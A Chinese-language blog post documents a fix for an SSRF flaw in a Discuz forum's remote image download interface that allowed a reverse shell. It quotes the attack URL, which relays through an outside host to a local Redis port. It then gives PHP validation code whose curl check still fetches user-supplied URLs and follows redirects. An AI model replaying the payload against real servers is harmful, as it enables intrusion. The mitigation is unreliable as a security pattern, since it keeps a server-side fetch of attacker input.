SSRF導致命令執行可反彈Shell漏洞解決辦法

迅雷官方論壇（discuz）被烏雲平台檢測出一個SSRF漏洞，攻擊者通過SSRF成功反彈shell，漏洞存在於一個遠程圖片下載的介面，沒有對url進行有效合法性檢測。今天臨時解決了這個漏洞，記錄一下修複方法。

漏洞還沒有公開，現在是憑密碼才能訪問。

這個存在漏洞的url地址是/forum.php?mod=ajax&action=downremoteimg&message=

攻擊者請求這個地址即可進行SSRF攻擊：

/forum.php?mod=ajax&action=downremoteimg&message=[img]http://tv.phpinfo.me/exp.php?s=ftp%26ip=127.0.0.1%26port=6379%26data=helo.jpg[/img]

這裡message包含使用者在論壇發布的圖片地址，正常情況下是圖片格式尾碼，雖然對尾碼進行了判斷，但是判斷不嚴格，這個地址可以傳任意的指令碼。

解決辦法是在介面增加合法性判斷，判斷url真實的尾碼是否合法，即使合法，也可能通過url rewrite方式偽造，更嚴格的判斷通過curl請求擷取頭資訊，根據返回的報文頭判斷Content-Type是否合法。

於是，在檔案/source/module/forum/forum_ajax.php檔案新增以下幾個函數：

PHP

//擷取上傳圖片url列表
function getImageList($temp)
{
    $urlList = array();
    foreach ($temp as $item) {
        $urlList[] = $item[1];
    }
    return $urlList;
}

/**
 * 檢查content-type是否合法
 * @param $imageList array 圖片url列表
 * @return bool true合法 false非法
 */
function checkContentType($imageList)
{
    $allowExtensions = array('jpg', 'jpeg', 'png', 'gif', 'bmp');
    $allowTypes = array('image/png', 'image/x-png', 'image/gif', 'image/jpeg', 'image/pjpeg');
    foreach ($imageList as $url) {
        $extension = getUrlExtension($url);
        if(!in_array(strtolower($extension), $allowExtensions)){
            return false;
        }
        $contentType = getContentType($url);
        if (!in_array($contentType, $allowTypes)) {
            return false;
        }
    }
    return true;
}

//擷取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

//擷取url尾碼
function getUrlExtension($url)
{
    $parseurl = parse_url($url);
    $extension = pathinfo($parseurl['path'], PATHINFO_EXTENSION);
    return $extension;
}

在具體介面處理的地方新增：

PHP

elseif($_GET['action'] == 'downremoteimg') {
 $_GET['message'] = str_replace(array("\r", "\n"), array($_GET['wysiwyg'] ? '<br />' : '', "\\n"), $_GET['message']);
 preg_match_all("/\[img\]\s*([^\[\<\r\n]+?)\s*\[\/img\]|\[img=\d{1,4}[x|\,]\d{1,4}\]\s*([^\[\<\r\n]+?)\s*\[\/img\]/is", $_GET['message'], $image1, PREG_SET_ORDER);
 preg_match_all("/\<img.+src=('|\"|)?(.*)(\\1)([\s].*)?\>/ismUe", $_GET['message'], $image2, PREG_SET_ORDER);
 $temp = $aids = $existentimg = array();
 if(is_array($image1) && !empty($image1)) {
  foreach($image1 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim(!empty($value[1]) ? $value[1] : $value[2])
   );
  }
 }
 if(is_array($image2) && !empty($image2)) {
  foreach($image2 as $value) {
   $temp[] = array(
    '0' => $value[0],
    '1' => trim($value[2])
   );
  }
 }

 //檢測圖片是否合法 Added by tanteng<tanteng@xunlei.com> 2016.07.07
        if(is_array($temp) && !empty($temp)){
            $imageList = getImageList($temp);
            $check = checkContentType($imageList);
            if ($check === false) {
                die('file upload error!');
            }
}

首先判斷url尾碼是否合法，再通過curl請求判斷header的Content-Type是否合法，因為後者不容易偽造。其中curl判斷檔案Content-Type方法：

PHP

//擷取content-type
function getContentType($url)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_NOBODY, 1);
    curl_exec($ch);
    $contentType = curl_getinfo($ch, CURLINFO_CONTENT_TYPE);
    return $contentType;
}

再訪問烏雲公開的漏洞地址，直接中止程式。

不過，這樣做有一個問題，有的圖片地址並不是真實的靜態檔案，如:http://image.demo.com/avatar/100/150*150，這個路徑就是一個圖片，儘管不是圖片格式的靜態路徑，那麼這樣判斷就會誤判，不過這種情況是很少數，暫且不管。